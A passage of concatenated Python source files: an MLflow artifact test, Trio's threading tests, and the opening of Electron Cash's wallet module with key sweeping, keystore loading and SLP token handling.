with open(src_file, 'w') as f:
f.write('Hello, World!')
mlflow_client.log_artifact(run_id, src_file, None)
mlflow_client.log_artifacts(run_id, src_dir, 'dir')
root_artifacts_list = mlflow_client.list_artifacts(run_id)
assert set([a.path for a in root_artifacts_list]) == {'my.file', 'dir'}
dir_artifacts_list = mlflow_client.list_artifacts(run_id, 'dir')
assert set([a.path for a in dir_artifacts_list]) == {'dir/my.file'}
all_artifacts = mlflow_client.download_artifacts(run_id, '.')
assert open('%s/my.file' % all_artifacts, 'r').read() == 'Hello, World!'
assert open('%s/dir/my.file' % all_artifacts, 'r').read() == 'Hello, World!'
dir_artifacts = mlflow_client.download_artifacts(run_id, 'dir')
assert open('%s/my.file' % dir_artifacts, 'r').read() == 'Hello, World!'
|
test_threads.py
|
import threading
import queue as stdlib_queue
import time
import pytest
from .. import _core
from .. import Event, CapacityLimiter, sleep
from ..testing import wait_all_tasks_blocked
from .._threads import (
to_thread_run_sync,
current_default_thread_limiter,
from_thread_run,
from_thread_run_sync,
BlockingTrioPortal,
)
from .._core.tests.test_ki import ki_self
async def test_do_in_trio_thread():
trio_thread = threading.current_thread()
async def check_case(do_in_trio_thread, fn, expected, trio_token=None):
record = []
def threadfn():
try:
record.append(("start", threading.current_thread()))
x = do_in_trio_thread(fn, record, trio_token=trio_token)
record.append(("got", x))
except BaseException as exc:
print(exc)
record.append(("error", type(exc)))
child_thread = threading.Thread(target=threadfn, daemon=True)
child_thread.start()
while child_thread.is_alive():
print("yawn")
await sleep(0.01)
assert record == [("start", child_thread), ("f", trio_thread), expected]
token = _core.current_trio_token()
def f(record):
assert not _core.currently_ki_protected()
record.append(("f", threading.current_thread()))
return 2
await check_case(from_thread_run_sync, f, ("got", 2), trio_token=token)
def f(record):
assert not _core.currently_ki_protected()
record.append(("f", threading.current_thread()))
raise ValueError
await check_case(from_thread_run_sync, f, ("error", ValueError), trio_token=token)
async def f(record):
assert not _core.currently_ki_protected()
await _core.checkpoint()
record.append(("f", threading.current_thread()))
return 3
await check_case(from_thread_run, f, ("got", 3), trio_token=token)
async def f(record):
assert not _core.currently_ki_protected()
await _core.checkpoint()
record.append(("f", threading.current_thread()))
raise KeyError
await check_case(from_thread_run, f, ("error", KeyError), trio_token=token)
async def test_do_in_trio_thread_from_trio_thread():
with pytest.raises(RuntimeError):
from_thread_run_sync(lambda: None) # pragma: no branch
async def foo(): # pragma: no cover
pass
with pytest.raises(RuntimeError):
from_thread_run(foo)
def test_run_in_trio_thread_ki():
# if we get a control-C during a run_in_trio_thread, then it propagates
# back to the caller (slick!)
record = set()
async def check_run_in_trio_thread():
token = _core.current_trio_token()
def trio_thread_fn():
print("in Trio thread")
assert not _core.currently_ki_protected()
print("ki_self")
try:
ki_self()
finally:
import sys
print("finally", sys.exc_info())
async def trio_thread_afn():
trio_thread_fn()
def external_thread_fn():
try:
print("running")
from_thread_run_sync(trio_thread_fn, trio_token=token)
except KeyboardInterrupt:
print("ok1")
record.add("ok1")
try:
from_thread_run(trio_thread_afn, trio_token=token)
except KeyboardInterrupt:
print("ok2")
record.add("ok2")
thread = threading.Thread(target=external_thread_fn)
thread.start()
print("waiting")
while thread.is_alive():
await sleep(0.01)
print("waited, joining")
thread.join()
print("done")
_core.run(check_run_in_trio_thread)
assert record == {"ok1", "ok2"}
def test_await_in_trio_thread_while_main_exits():
record = []
ev = Event()
async def trio_fn():
record.append("sleeping")
ev.set()
await _core.wait_task_rescheduled(lambda _: _core.Abort.SUCCEEDED)
def thread_fn(token):
try:
from_thread_run(trio_fn, trio_token=token)
except _core.Cancelled:
record.append("cancelled")
async def main():
token = _core.current_trio_token()
thread = threading.Thread(target=thread_fn, args=(token,))
thread.start()
await ev.wait()
assert record == ["sleeping"]
return thread
thread = _core.run(main)
thread.join()
assert record == ["sleeping", "cancelled"]
async def test_run_in_worker_thread():
trio_thread = threading.current_thread()
def f(x):
return (x, threading.current_thread())
x, child_thread = await to_thread_run_sync(f, 1)
assert x == 1
assert child_thread != trio_thread
def g():
raise ValueError(threading.current_thread())
with pytest.raises(ValueError) as excinfo:
await to_thread_run_sync(g)
print(excinfo.value.args)
assert excinfo.value.args[0] != trio_thread
async def test_run_in_worker_thread_cancellation():
register = [None]
def f(q):
# Make the thread block for a controlled amount of time
register[0] = "blocking"
q.get()
register[0] = "finished"
async def child(q, cancellable):
record.append("start")
try:
return await to_thread_run_sync(f, q, cancellable=cancellable)
finally:
record.append("exit")
record = []
q = stdlib_queue.Queue()
async with _core.open_nursery() as nursery:
nursery.start_soon(child, q, True)
# Give it a chance to get started. (This is important because
# to_thread_run_sync does a checkpoint_if_cancelled before
# blocking on the thread, and we don't want to trigger this.)
await wait_all_tasks_blocked()
assert record == ["start"]
# Then cancel it.
nursery.cancel_scope.cancel()
# The task exited, but the thread didn't:
assert register[0] != "finished"
# Put the thread out of its misery:
q.put(None)
while register[0] != "finished":
time.sleep(0.01)
# This one can't be cancelled
record = []
register[0] = None
async with _core.open_nursery() as nursery:
nursery.start_soon(child, q, False)
await wait_all_tasks_blocked()
nursery.cancel_scope.cancel()
with _core.CancelScope(shield=True):
for _ in range(10):
await _core.checkpoint()
# It's still running
assert record == ["start"]
q.put(None)
# Now it exits
# But if we cancel *before* it enters, the entry is itself a cancellation
# point
with _core.CancelScope() as scope:
scope.cancel()
await child(q, False)
assert scope.cancelled_caught
# Make sure that if trio.run exits, and then the thread finishes, then that's
# handled gracefully. (Requires that the thread result machinery be prepared
# for call_soon to raise RunFinishedError.)
def test_run_in_worker_thread_abandoned(capfd, monkeypatch):
monkeypatch.setattr(_core._thread_cache, "IDLE_TIMEOUT", 0.01)
q1 = stdlib_queue.Queue()
q2 = stdlib_queue.Queue()
def thread_fn():
q1.get()
q2.put(threading.current_thread())
async def main():
async def child():
await to_thread_run_sync(thread_fn, cancellable=True)
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
await wait_all_tasks_blocked()
nursery.cancel_scope.cancel()
_core.run(main)
q1.put(None)
# This makes sure:
# - the thread actually ran
# - that thread has finished before we check for its output
thread = q2.get()
while thread.is_alive():
time.sleep(0.01) # pragma: no cover
# Make sure we don't have a "Exception in thread ..." dump to the console:
out, err = capfd.readouterr()
assert not out and not err
@pytest.mark.parametrize("MAX", [3, 5, 10])
@pytest.mark.parametrize("cancel", [False, True])
@pytest.mark.parametrize("use_default_limiter", [False, True])
async def test_run_in_worker_thread_limiter(MAX, cancel, use_default_limiter):
# This test is a bit tricky. The goal is to make sure that if we set
# limiter=CapacityLimiter(MAX), then in fact only MAX threads are ever
# running at a time, even if there are more concurrent calls to
# to_thread_run_sync, and even if some of those are cancelled. And
# also to make sure that the default limiter actually limits.
COUNT = 2 * MAX
gate = threading.Event()
lock = threading.Lock()
if use_default_limiter:
c = current_default_thread_limiter()
orig_total_tokens = c.total_tokens
c.total_tokens = MAX
limiter_arg = None
else:
c = CapacityLimiter(MAX)
orig_total_tokens = MAX
limiter_arg = c
try:
# We used to use regular variables and 'nonlocal' here, but it turns
# out that it's not safe to assign to closed-over variables that are
# visible in multiple threads, at least as of CPython 3.6 and PyPy
# 5.8:
#
# https://bugs.python.org/issue30744
# https://bitbucket.org/pypy/pypy/issues/2591/
#
# Mutating them in-place is OK though (as long as you use proper
# locking etc.).
class state:
pass
state.ran = 0
state.high_water = 0
state.running = 0
state.parked = 0
token = _core.current_trio_token()
def thread_fn(cancel_scope):
print("thread_fn start")
from_thread_run_sync(cancel_scope.cancel, trio_token=token)
with lock:
state.ran += 1
state.running += 1
state.high_water = max(state.high_water, state.running)
# The Trio thread below watches this value and uses it as a
# signal that all the stats calculations have finished.
state.parked += 1
gate.wait()
with lock:
state.parked -= 1
state.running -= 1
print("thread_fn exiting")
async def run_thread(event):
with _core.CancelScope() as cancel_scope:
await to_thread_run_sync(
thread_fn, cancel_scope, limiter=limiter_arg, cancellable=cancel,
)
print("run_thread finished, cancelled:", cancel_scope.cancelled_caught)
event.set()
async with _core.open_nursery() as nursery:
print("spawning")
events = []
for i in range(COUNT):
events.append(Event())
nursery.start_soon(run_thread, events[-1])
await wait_all_tasks_blocked()
# In the cancel case, we in particular want to make sure that the
# cancelled tasks don't release the semaphore. So let's wait until
# at least one of them has exited, and that everything has had a
# chance to settle down from this, before we check that everyone
# who's supposed to be waiting is waiting:
if cancel:
print("waiting for first cancellation to clear")
await events[0].wait()
await wait_all_tasks_blocked()
# Then wait until the first MAX threads are parked in gate.wait(),
# and the next MAX threads are parked on the semaphore, to make
# sure no-one is sneaking past, and to make sure the high_water
# check below won't fail due to scheduling issues. (It could still
# fail if too many threads are let through here.)
while state.parked != MAX or c.statistics().tasks_waiting != MAX:
await sleep(0.01) # pragma: no cover
# Then release the threads
gate.set()
assert state.high_water == MAX
if cancel:
# Some threads might still be running; need to wait for them to
# finish before checking that all threads ran. We can do this
# using the CapacityLimiter.
while c.borrowed_tokens > 0:
await sleep(0.01) # pragma: no cover
assert state.ran == COUNT
assert state.running == 0
finally:
c.total_tokens = orig_total_tokens
async def test_run_in_worker_thread_custom_limiter():
# Basically just checking that we only call acquire_on_behalf_of and
# release_on_behalf_of, since that's part of our documented API.
record = []
class CustomLimiter:
async def acquire_on_behalf_of(self, borrower):
record.append("acquire")
self._borrower = borrower
def release_on_behalf_of(self, borrower):
record.append("release")
assert borrower == self._borrower
await to_thread_run_sync(lambda: None, limiter=CustomLimiter())
assert record == ["acquire", "release"]
async def test_run_in_worker_thread_limiter_error():
record = []
class BadCapacityLimiter:
async def acquire_on_behalf_of(self, borrower):
record.append("acquire")
def release_on_behalf_of(self, borrower):
record.append("release")
raise ValueError
bs = BadCapacityLimiter()
with pytest.raises(ValueError) as excinfo:
await to_thread_run_sync(lambda: None, limiter=bs)
assert excinfo.value.__context__ is None
assert record == ["acquire", "release"]
record = []
# If the original function raised an error, then the semaphore error
# chains with it
d = {}
with pytest.raises(ValueError) as excinfo:
await to_thread_run_sync(lambda: d["x"], limiter=bs)
assert isinstance(excinfo.value.__context__, KeyError)
assert record == ["acquire", "release"]
async def test_run_in_worker_thread_fail_to_spawn(monkeypatch):
# Test the unlikely but possible case where trying to spawn a thread fails
def bad_start(self, *args):
raise RuntimeError("the engines canna take it captain")
monkeypatch.setattr(_core._thread_cache.ThreadCache, "start_thread_soon", bad_start)
limiter = current_default_thread_limiter()
assert limiter.borrowed_tokens == 0
# We get an appropriate error, and the limiter is cleanly released
with pytest.raises(RuntimeError) as excinfo:
await to_thread_run_sync(lambda: None) # pragma: no cover
assert "engines" in str(excinfo.value)
assert limiter.borrowed_tokens == 0
async def test_trio_to_thread_run_sync_token():
# Test that to_thread_run_sync automatically injects the current trio token
# into a spawned thread
def thread_fn():
callee_token = from_thread_run_sync(_core.current_trio_token)
return callee_token
caller_token = _core.current_trio_token()
callee_token = await to_thread_run_sync(thread_fn)
assert callee_token == caller_token
async def test_trio_from_thread_run_sync():
# Test that to_thread_run_sync correctly "hands off" the trio token to
# trio.from_thread.run_sync()
def thread_fn():
trio_time = from_thread_run_sync(_core.current_time)
return trio_time
trio_time = await to_thread_run_sync(thread_fn)
assert isinstance(trio_time, float)
# Test correct error when passed async function
async def async_fn(): # pragma: no cover
pass
def thread_fn():
from_thread_run_sync(async_fn)
with pytest.raises(TypeError, match="expected a sync function"):
await to_thread_run_sync(thread_fn)
async def test_trio_from_thread_run():
# Test that to_thread_run_sync correctly "hands off" the trio token to
# trio.from_thread.run()
record = []
async def back_in_trio_fn():
_core.current_time() # implicitly checks that we're in trio
record.append("back in trio")
def thread_fn():
record.append("in thread")
from_thread_run(back_in_trio_fn)
await to_thread_run_sync(thread_fn)
assert record == ["in thread", "back in trio"]
# Test correct error when passed sync function
def sync_fn(): # pragma: no cover
pass
with pytest.raises(TypeError, match="appears to be synchronous"):
await to_thread_run_sync(from_thread_run, sync_fn)
async def test_trio_from_thread_token():
# Test that to_thread_run_sync and spawned trio.from_thread.run_sync()
# share the same Trio token
def thread_fn():
callee_token = from_thread_run_sync(_core.current_trio_token)
return callee_token
caller_token = _core.current_trio_token()
callee_token = await to_thread_run_sync(thread_fn)
assert callee_token == caller_token
async def test_trio_from_thread_token_kwarg():
# Test that to_thread_run_sync and spawned trio.from_thread.run_sync() can
# use an explicitly defined token
def thread_fn(token):
callee_token = from_thread_run_sync(_core.current_trio_token, trio_token=token)
return callee_token
caller_token = _core.current_trio_token()
callee_token = await to_thread_run_sync(thread_fn, caller_token)
assert callee_token == caller_token
async def test_from_thread_no_token():
# Test that a "raw call" to trio.from_thread.run() fails because no token
# has been provided
with pytest.raises(RuntimeError):
from_thread_run_sync(_core.current_time)
def test_run_fn_as_system_task_catched_badly_typed_token():
with pytest.raises(RuntimeError):
from_thread_run_sync(_core.current_time, trio_token="Not TrioTokentype")
async def test_do_in_trio_thread_from_trio_thread_legacy():
# This check specifically confirms that a RuntimeError will be raised if
# the old BlockingTrioPortal API calls into a trio loop while already
# running inside of one.
portal = BlockingTrioPortal()
with pytest.raises(RuntimeError):
portal.run_sync(lambda: None) # pragma: no branch
async def foo(): # pragma: no cover
pass
with pytest.raises(RuntimeError):
portal.run(foo)
async def test_BlockingTrioPortal_with_explicit_TrioToken():
# This tests the deprecated BlockingTrioPortal with a token passed in to
# confirm that both methods of making a portal are supported by
# trio.from_thread
token = _core.current_trio_token()
def worker_thread(token):
with pytest.raises(RuntimeError):
BlockingTrioPortal()
portal = BlockingTrioPortal(token)
return portal.run_sync(threading.current_thread)
t = await to_thread_run_sync(worker_thread, token)
assert t == threading.current_thread()
def test_BlockingTrioPortal_deprecated_export(recwarn):
import trio
btp = trio.BlockingTrioPortal
assert btp is BlockingTrioPortal
|
wallet.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - ImportedAddressWallet: imported address, no keystore
# - ImportedPrivkeyWallet: imported private keys, keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import copy
import errno
import json
import itertools
import os
import queue
import random
import re
import threading
import time
from collections import defaultdict, namedtuple
from enum import Enum, auto
from functools import partial
from typing import Set, Tuple, Union
from .i18n import ngettext
from .util import (NotEnoughFunds, NotEnoughFundsSlp, NotEnoughUnfrozenFundsSlp, ExcessiveFee, PrintError,
UserCancelled, profiler, format_satoshis, format_time, finalization_print_error, to_string,
TimeoutException, is_verbose)
from .address import Address, Script, ScriptOutput, PublicKey, OpCodes
from .bitcoin import *
from .version import *
from .keystore import load_keystore, Hardware_KeyStore, Imported_KeyStore, BIP32_KeyStore, xpubkey_to_address
from . import networks
from . import keystore
from .storage import multisig_type, WalletStorage
from . import transaction
from .transaction import Transaction, InputValueMissing
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV, SPVDelegate
from . import schnorr
from . import ecc_fast
from .blockchain import NULL_HASH_HEX
from . import paymentrequest
from .paymentrequest import PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .paymentrequest import InvoiceStore
from .contacts import Contacts
from . import cashacct
from .slp import SlpMessage, SlpParsingError, SlpInvalidOutputMessage, SlpUnsupportedSlpTokenType, SlpNoMintingBatonFound, OpreturnError
from . import slp_validator_0x01, slp_validator_0x01_nft1, slp_slpdb_validator
from .slp_graph_search import slp_gs_mgr
def _(message): return message
TX_STATUS = [
_('Unconfirmed parent'),
_('Low fee'),
_('Unconfirmed'),
_('Not Verified'),
]
del _
from .i18n import _
DEFAULT_CONFIRMED_ONLY = False
def relayfee(network):
RELAY_FEE = 5000
MAX_RELAY_FEE = 50000
f = network.relay_fee if network and network.relay_fee else RELAY_FEE
return min(f, MAX_RELAY_FEE)
def dust_threshold(network):
# Change < dust threshold is added to the tx fee
#return 182 * 3 * relayfee(network) / 1000 # original Electrum logic
#return 1 # <-- was this value until late Sept. 2018
return 546 # hard-coded Bitcoin Cash dust threshold. Was changed to this as of Sept. 2018
def sweep_preparations(privkeys, network, imax=100):
class InputsMaxxed(Exception):
pass
def append_utxos_to_inputs(inputs, pubkey, txin_type):
if txin_type == 'p2pkh':
address = Address.from_pubkey(pubkey)
else:
address = PublicKey.from_pubkey(pubkey)
sh = address.to_scripthash_hex()
u = network.synchronous_get(('blockchain.scripthash.listunspent', [sh]))
for item in u:
if len(inputs) >= imax:
raise InputsMaxxed()
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = item['tx_pos']
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = bitcoin.public_key_from_private_key(privkey, compressed)
append_utxos_to_inputs(inputs, pubkey, txin_type)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
try:
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
elif txin_type == 'p2sh':
raise ValueError(_("The specified WIF key '{}' is a p2sh WIF key. These key types cannot be swept.").format(sec))
except InputsMaxxed:
pass
if not inputs:
raise ValueError(_('No inputs found. (Note that inputs need to be confirmed)'))
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100, sign_schnorr=False):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [(TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
tx.BIP_LI01_sort()
tx.sign(keypairs)
return tx
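# Minimal usage sketch (not part of the original module), assuming a connected `network`
# object and a `config` capable of fee estimation; the WIF key and address strings below
# are placeholders, not real values:
#
#   tx = sweep(['<WIF private key>'], network, config,
#              Address.from_string('<destination address>'))
#
# The returned Transaction is fully signed and can subsequently be broadcast via the
# network object.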
class Abstract_Wallet(PrintError, SPVDelegate):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = PACKAGE_VERSION
self.pre_release_tag = PRE_RELEASE_TAG
self.storage = storage
self.thread = None # this is used by the qt main_window to store a QThread. We just make sure it's always defined as an attribute here.
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
# CashAccounts subsystem. Its network-dependent layer is started in
# start_threads. Note: object instantiation should be lightweight here.
# self.cashacct.load() is called later in this function to load data.
self.cashacct = cashacct.CashAcct(self)
finalization_print_error(self.cashacct) # debug object lifecycle
# slp graph databases for token type 1 and NFT1
self.slp_graph_0x01, self.slp_graph_0x01_nft = None, None
self.weak_window = None # Some of the GUI classes, such as the Qt ElectrumWindow, use this to refer back to themselves. This should always be a weakref.ref (Weak.ref), or None
# Removes defunct entries from self.pruned_txo asynchronously
self.pruned_txo_cleaner_thread = None
# Cache of Address -> (c,u,x) balance. This cache is used by
# get_addr_balance to significantly speed it up (it is called a lot).
# Cache entries are invalidated when tx's are seen involving this
# address (address history changes). Entries to this cache are added
# only inside get_addr_balance.
# Note that this data structure is touched by the network and GUI
# thread concurrently without the use of locks, because Python GIL
# allows us to get away with such things. As such do not iterate over
# this dict, but simply add/remove items to/from it in 1-liners (which
# Python's GIL makes thread-safe implicitly).
self._addr_bal_cache = {}
# We keep a set of the wallet's change and receiving addresses so that is_mine()
# checks are O(logN) rather than O(N). This creates/resets that cache.
self.invalidate_address_set_cache()
self.gap_limit_for_change = 20 # constant
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
# Frozen addresses
frozen_addresses = storage.get('frozen_addresses',[])
self.frozen_addresses = set(Address.from_string(addr)
for addr in frozen_addresses)
# Frozen coins (UTXOs) -- note that we have 2 independent levels of "freezing": address-level and coin-level.
# The two types of freezing are flagged independently of each other and 'spendable' is defined as a coin that satisfies
# BOTH levels of freezing.
self.frozen_coins = set(storage.get('frozen_coins', []))
self.frozen_coins_tmp = set() # in-memory only
# address -> list(txid, height)
history = storage.get('addr_history',{})
self._history = self.to_Address_dict(history)
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
# The only lock. We used to have two here. That was more technical debt
# without much purpose. 1 lock is sufficient. In particular data
# structures that are touched by the network thread as well as the GUI
# (such as self.transactions, history, etc) need to be synchronized
# using this mutex.
self.lock = threading.RLock()
# load requests
requests = self.storage.get('payment_requests', {})
for key, req in requests.items():
req['address'] = Address.from_string(key)
self.receive_requests = {req['address']: req
for req in requests.values()}
# Transactions pending verification. A map from tx hash to transaction
# height. Access is contended so a lock is needed. Client code should
# use get_unverified_tx to get a thread-safe copy of this dict.
self.unverified_tx = defaultdict(int)
# Verified transactions. Each value is a (height, timestamp, block_pos) tuple. Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
# cashacct is started in start_threads, but it needs to have relevant
# data here, before the below calls happen
self.cashacct.load()
# Now, finally, after object is constructed -- we can do this
self.load_keystore_wrapper()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.check_history()
# Print debug message on finalization
finalization_print_error(self, "[{}/{}] finalized".format(type(self).__name__, self.diagnostic_name()))
@property
def is_slp(self):
''' Note that the various Slp_* classes explicitly write to storage
to set the proper wallet_type on construction unconditionally, so
this should always be valid for SLP wallets. '''
return "slp_" in self.storage.get('wallet_type', '')
@classmethod
def to_Address_dict(cls, d):
'''Convert a dict of strings to a dict of Address objects.'''
return {Address.from_string(text): value for text, value in d.items()}
@classmethod
def from_Address_dict(cls, d):
'''Convert a dict of Address objects to a dict of strings.'''
return {addr.to_storage_string(): value
for addr, value in d.items()}
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_keystore_wrapper(self):
""" Loads the keystore, but also tries to preserve derivation(s). Older
Electron Cash versions would not save the derivation for all keystore
types. So this function ensures:
1. That on first run, we store the keystore_derivations to top-level
storage (which is preserved always).
2. On subsequent runs we try and load the keystore_derivations from
storage and restore them if the individual keystore.derivation data
items were lost (because user loaded wallet with older Electron
Cash).
This function is provided to allow users to switch between old and new
EC versions. In the future if we deprecate the wallet format, or if
enough time has passed, this function may be removed and the simple
self.load_keystore() may be used instead. """
self.load_keystore()
if not hasattr(self, 'get_keystores'):
return
from .keystore import Deterministic_KeyStore, Old_KeyStore
keystores = self.get_keystores()
keystore_derivations = self.storage.get('keystore_derivations', [])
if len(keystore_derivations) != len(keystores):
keystore_derivations = [None] * len(keystores)
updated, updated_ks, updated_st = False, False, False
for i, keystore in enumerate(keystores):
if i == 0 and isinstance(keystore, Deterministic_KeyStore) and not keystore.seed_type:
# Attempt to update keystore.seed_type
if isinstance(keystore, Old_KeyStore):
keystore.seed_type = 'old'
updated_st = True
else:
# attempt to restore the seed_type based on wallet saved "seed_type"
typ = self.storage.get('seed_type')
if typ in ('standard', 'electrum'):
keystore.seed_type = 'electrum'
updated_st = True
elif typ == 'bip39':
keystore.seed_type = 'bip39'
updated_st = True
saved_der = keystore_derivations[i]
der = (keystore.has_derivation() and keystore.derivation) or None
if der != saved_der:
if der:
# keystore had a derivation, but top-level storage did not
# (this branch is typically taken on first run after
# restoring from seed or creating a new wallet)
keystore_derivations[i] = saved_der = der
updated = True
elif saved_der:
# we had a derivation but keystore did not. This branch is
# taken if the user has loaded this wallet with an older
# version of Electron Cash. Attempt to restore their
# derivation item in keystore.
keystore.derivation = der # write to keystore
updated_ks = True # tell it to re-save
if updated:
self.print_error("Updated keystore_derivations")
self.storage.put('keystore_derivations', keystore_derivations)
if updated_ks or updated_st:
if updated_ks:
self.print_error("Updated keystore (lost derivations restored)")
if updated_st:
self.print_error("Updated keystore (lost seed_type restored)")
self.save_keystore()
if any((updated, updated_ks, updated_st)):
self.storage.write()
@profiler
def load_transactions(self):
txi = self.storage.get('txi', {})
self.txi = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txi.items()
# skip empty entries to save memory and disk space
if value}
txo = self.storage.get('txo', {})
self.txo = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txo.items()
# skip empty entries to save memory and disk space
if value}
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
self.pruned_txo_values = set(self.pruned_txo.values())
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if not self.txi.get(tx_hash) and not self.txo.get(tx_hash) and (tx_hash not in self.pruned_txo_values):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
self.cashacct.remove_transaction_hook(tx_hash)
self.slpv1_validity = self.storage.get('slpv1_validity', {})
self.token_types = self.storage.get('token_types', {})
self.tx_tokinfo = self.storage.get('tx_tokinfo', {})
# load up slp_txo as defaultdict-of-defaultdict-of-dicts
self._slp_txo = defaultdict(lambda: defaultdict(dict))
for addr, addrdict in self.to_Address_dict(self.storage.get('slp_txo',{})).items():
for txid, txdict in addrdict.items():
# need to do this iteration since json stores int keys as decimal strings.
self._slp_txo[addr][txid] = {int(idx):d for idx,d in txdict.items()}
ok = self.storage.get('slp_data_version', False)
if ok != 3:
self.rebuild_slp()
@profiler
def save_transactions(self, write=False):
with self.lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
txi = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txi.items()
# skip empty entries to save memory and disk space
if value}
txo = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txo.items()
# skip empty entries to save memory and disk space
if value}
self.storage.put('txi', txi)
self.storage.put('txo', txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
history = self.from_Address_dict(self._history)
self.storage.put('addr_history', history)
### SLP stuff
self.storage.put('slpv1_validity', self.slpv1_validity)
self.storage.put('token_types', self.token_types)
self.storage.put('slp_txo', self.from_Address_dict(self._slp_txo))
self.storage.put('tx_tokinfo', self.tx_tokinfo)
self.storage.put('slp_data_version', 3)
if write:
self.storage.write()
def activate_slp(self):
# This gets called in two situations:
# - Upon wallet startup, it checks config to see if SLP should be enabled.
# - During wallet operation, on a network reconnect, to "wake up" the validator -- According to JSCramer this is required. TODO: Investigate why that is
with self.lock:
for tx_hash, tti in self.tx_tokinfo.items():
# Fire up validation on unvalidated txes
try:
tx = self.transactions[tx_hash]
self.slp_check_validation(tx_hash, tx)
except KeyError:
continue
_add_token_hex_re = re.compile('^[a-f0-9]{64}$')
def add_token_type(self, token_id, entry, check_validation=True):
if not isinstance(token_id, str) or not self._add_token_hex_re.match(token_id):
# Paranoia: we enforce canonical hex string as lowercase to avoid
# problems with the same token-id being added as upper or lowercase
# by client code. This is because token_id becomes a dictionary key
# in various places and it not being identical would create chaos.
raise ValueError('token_id must be a lowercase hex string of exactly 64 characters!')
with self.lock:
self.token_types[token_id] = dict(entry)
self.storage.put('token_types', self.token_types)
for tx_hash, tti in self.tx_tokinfo.items():
# Fire up validation on unvalidated txes of matching token_id
try:
if tti['token_id'] == token_id and check_validation:
tx = self.transactions[tx_hash]
self.slp_check_validation(tx_hash, tx)
except KeyError: # This catches the case where tx_tokinfo was set to {}
continue
def add_token_safe(self, token_class: str, token_id: str, token_name: str,
decimals_divisibility: int,
*, error_callback=None, allow_overwrite=False,
write_storage=True) -> bool:
''' This code was refactored from main_window.py to allow other
subsystems (eg CLI/RPC, other platforms, etc) to add tokens.
This function does some minimal sanity checks and returns True
on success or False on failure. The optional error_callback
